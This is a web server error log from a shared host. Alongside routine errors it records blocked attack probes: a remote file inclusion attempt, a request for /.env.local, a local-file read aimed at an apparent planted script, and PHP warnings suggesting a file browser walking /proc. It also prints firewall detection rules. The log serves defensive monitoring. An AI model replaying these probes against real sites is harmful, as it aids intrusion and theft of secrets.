[Mon May 11 14:21:28.027839 2026] [core:error] [pid 1319886:tid 1319897] [client 4.193.137.131:20356] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:28.027874 2026] [core:error] [pid 1319886:tid 1319897] [client 4.193.137.131:20356] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:28.505188 2026] [core:error] [pid 1319885:tid 1319904] [client 4.193.137.131:20424] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:28.505224 2026] [core:error] [pid 1319885:tid 1319904] [client 4.193.137.131:20424] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:28.982567 2026] [core:error] [pid 1319953:tid 1319968] [client 4.193.137.131:20428] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:28.982682 2026] [core:error] [pid 1319953:tid 1319968] [client 4.193.137.131:20428] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:29.458238 2026] [core:error] [pid 1319886:tid 1319929] [client 4.193.137.131:20447] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:29.458272 2026] [core:error] [pid 1319886:tid 1319929] [client 4.193.137.131:20447] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:29.934642 2026] [core:error] [pid 1320398:tid 1320424] [client 4.193.137.131:20477] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:29.934679 2026] [core:error] [pid 1320398:tid 1320424] [client 4.193.137.131:20477] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:30.369046 2026] [autoindex:error] [pid 1319886:tid 1319924] [client 34.193.251.180:22723] AH01276: Cannot serve directory /home/totalcloud/public_html/sitebuilder/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 14:21:30.371944 2026] [core:error] [pid 1319886:tid 1319924] [client 34.193.251.180:22723] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:30.416605 2026] [core:error] [pid 1320674:tid 1320703] [client 4.193.137.131:20421] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:30.416633 2026] [core:error] [pid 1320674:tid 1320703] [client 4.193.137.131:20421] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:30.930382 2026] [core:error] [pid 1319885:tid 1319938] [client 4.193.137.131:20451] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:30.930424 2026] [core:error] [pid 1319885:tid 1319938] [client 4.193.137.131:20451] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:31.441079 2026] [core:error] [pid 1320674:tid 1320711] [client 4.193.137.131:24320] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:31.441115 2026] [core:error] [pid 1320674:tid 1320711] [client 4.193.137.131:24320] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:31.923859 2026] [core:error] [pid 1319885:tid 1319910] [client 4.193.137.131:20431] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:31.923894 2026] [core:error] [pid 1319885:tid 1319910] [client 4.193.137.131:20431] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:32.426074 2026] [core:error] [pid 1319953:tid 1319961] [client 4.193.137.131:19659] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:32.426121 2026] [core:error] [pid 1319953:tid 1319961] [client 4.193.137.131:19659] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:54.106434 2026] [security2:error] [pid 1319953:tid 1319961] [client 43.153.96.79:47606] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/"] [unique_id "agHJ4uSQ-m-m0ukSShtvbwAAAUY"]
[Mon May 11 14:21:57.425136 2026] [security2:error] [pid 1320674:tid 1320697] [client 43.153.96.79:55454] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/"] [unique_id "agHJ5aO9RdIr1DwxYR1_pgAAAMc"], referer: http://rixonephotography.com
[Mon May 11 14:22:25.759374 2026] [security2:error] [pid 1319998:tid 1320017] [client 185.191.171.11:60516] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://209.38.57.124 found within ARGS:url: http://209.38.57.124/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHKAat2WtvoFr7xvGzBHwAAAJE"]
[Mon May 11 14:22:25.760116 2026] [security2:error] [pid 1319998:tid 1320017] [client 185.191.171.11:60516] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHKAat2WtvoFr7xvGzBHwAAAJE"]
[Mon May 11 14:22:25.760385 2026] [security2:error] [pid 1319998:tid 1320017] [client 185.191.171.11:60516] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHKAat2WtvoFr7xvGzBHwAAAJE"]
[Mon May 11 14:22:55.178823 2026] [security2:error] [pid 1319998:tid 1320003] [client 18.207.79.144:44812] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/viatech-ye.com"] [unique_id "agHKH6t2WtvoFr7xvGzBYgAAAIM"]
[Mon May 11 14:22:55.179203 2026] [security2:error] [pid 1319998:tid 1320003] [client 18.207.79.144:44812] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/viatech-ye.com"] [unique_id "agHKH6t2WtvoFr7xvGzBYgAAAIM"]
[Mon May 11 14:22:55.179458 2026] [security2:error] [pid 1319998:tid 1320003] [client 18.207.79.144:44812] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/viatech-ye.com"] [unique_id "agHKH6t2WtvoFr7xvGzBYgAAAIM"]
[Mon May 11 14:23:09.005502 2026] [security2:error] [pid 1319885:tid 1319898] [client 176.65.139.168:43050] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "webshop.totalcloud.fr"] [uri "/.env.local"] [unique_id "agHKLVchVQ3tCn0m9OpFCAAAAQg"]
[Mon May 11 14:23:09.005763 2026] [security2:error] [pid 1319885:tid 1319898] [client 176.65.139.168:43050] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "webshop.totalcloud.fr"] [uri "/.env.local"] [unique_id "agHKLVchVQ3tCn0m9OpFCAAAAQg"]
[Mon May 11 14:23:09.329762 2026] [security2:error] [pid 1319885:tid 1319898] [client 176.65.139.168:43050] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "webshop.totalcloud.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHKLVchVQ3tCn0m9OpFCAAAAQg"]
[Mon May 11 14:23:23.001393 2026] [:error] [pid 1320398:tid 1320424] [client 181.94.229.21:49821] File does not exist: /home/ofcrysta/public_html/exposition_chien.php
PHP Warning:  filesize(): stat failed for /proc/596/task/596/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/596/task/596/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/596/task/596/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/596/task/596/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/596/task/596/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/596/task/596/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 14:24:39.836438 2026] [security2:error] [pid 1319953:tid 1319968] [client 150.109.46.88:57774] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.letamsgarage.fr"] [uri "/"] [unique_id "agHKh-SQ-m-m0ukSShtwKgAAAU0"]
[Mon May 11 14:24:54.075792 2026] [security2:error] [pid 1320398:tid 1320400] [client 150.109.46.88:39966] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.letamsgarage.fr"] [uri "/"] [unique_id "agHKluJEyNRN152ArOR45wAAAEA"], referer: http://www.letamsgarage.fr
[Mon May 11 14:24:59.577520 2026] [security2:error] [pid 1320674:tid 1320697] [client 150.109.46.88:47492] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agHKm6O9RdIr1DwxYR2AjgAAAMc"], referer: https://www.letamsgarage.fr/
[Mon May 11 14:25:05.945006 2026] [:error] [pid 1320674:tid 1320694] [client 43.230.201.87:57226] File does not exist: /home/cpcentre/public_html/wp-login.php
[Mon May 11 14:26:12.687488 2026] [security2:error] [pid 1319953:tid 1319966] [client 49.51.252.146:48464] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/"] [unique_id "agHK5OSQ-m-m0ukSShtwpQAAAUs"]
[Mon May 11 14:27:27.697533 2026] [authz_core:error] [pid 1319886:tid 1319905] [client 88.88.156.124:47858] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/woocommerce/src/Internal/Integrations/error_log
[Mon May 11 14:27:29.219234 2026] [authz_core:error] [pid 1319886:tid 1319905] [client 88.88.156.124:47858] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/woocommerce/src/Internal/Integrations/error_log
[Mon May 11 14:27:30.743207 2026] [authz_core:error] [pid 1319886:tid 1319905] [client 88.88.156.124:47858] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/content-type-visibility/user-interface/error_log
[Mon May 11 14:27:32.264071 2026] [authz_core:error] [pid 1319886:tid 1319905] [client 88.88.156.124:47858] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/content-type-visibility/user-interface/error_log
[Mon May 11 14:27:33.787510 2026] [authz_core:error] [pid 1319886:tid 1319905] [client 88.88.156.124:47858] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/content-type-visibility/user-interface/error_log
[Mon May 11 14:27:34.871191 2026] [authz_core:error] [pid 1320674:tid 1320709] [client 47.128.23.240:23324] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/theme-compat/error_log
[Mon May 11 14:27:35.306504 2026] [authz_core:error] [pid 1319886:tid 1319905] [client 88.88.156.124:47858] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/content-type-visibility/user-interface/error_log
[Mon May 11 14:27:37.414845 2026] [security2:error] [pid 1320398:tid 1320406] [client 170.106.161.78:51258] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "dev.rentparadise.fr"] [uri "/"] [unique_id "agHLOeJEyNRN152ArOR5xAAAAEY"]
[Mon May 11 14:27:41.001117 2026] [security2:error] [pid 1319885:tid 1319900] [client 170.106.161.78:34504] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "dev.rentparadise.fr"] [uri "/dev/"] [unique_id "agHLPFchVQ3tCn0m9OpHXQAAAQk"], referer: http://dev.rentparadise.fr
[Mon May 11 14:27:41.002980 2026] [core:error] [pid 1319885:tid 1319900] [client 170.106.161.78:34504] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://dev.rentparadise.fr
[Mon May 11 14:27:41.002999 2026] [core:error] [pid 1319885:tid 1319900] [client 170.106.161.78:34504] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://dev.rentparadise.fr
[Mon May 11 14:27:42.346521 2026] [:error] [pid 1319885:tid 1319915] [client 144.76.19.157:22328] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:28:17.901858 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:18.045995 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:18.135381 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:18.227070 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:18.382894 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:18.476905 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:18.577263 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:18.673376 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:18.762714 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:18.856663 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:18.948428 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:19.111994 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:19.201663 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:19.211887 2026] [security2:error] [pid 1319885:tid 1319927] [client 216.73.216.110:22613] ModSecurity: Warning. Matched phrase ".bash_logout" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .bash_logout found within ARGS:filesrc: /etc/skel/.bash_logout"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHLY1chVQ3tCn0m9OpHlwAAARQ"]
[Mon May 11 14:28:19.212544 2026] [security2:error] [pid 1319885:tid 1319927] [client 216.73.216.110:22613] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHLY1chVQ3tCn0m9OpHlwAAARQ"]
[Mon May 11 14:28:19.298333 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:19.311872 2026] [security2:error] [pid 1319885:tid 1319927] [client 216.73.216.110:22613] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHLY1chVQ3tCn0m9OpHlwAAARQ"]
[Mon May 11 14:28:19.455422 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:19.544909 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:19.634505 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:19.723759 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:19.824570 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:19.990427 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:20.081101 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:20.172062 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:20.261956 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
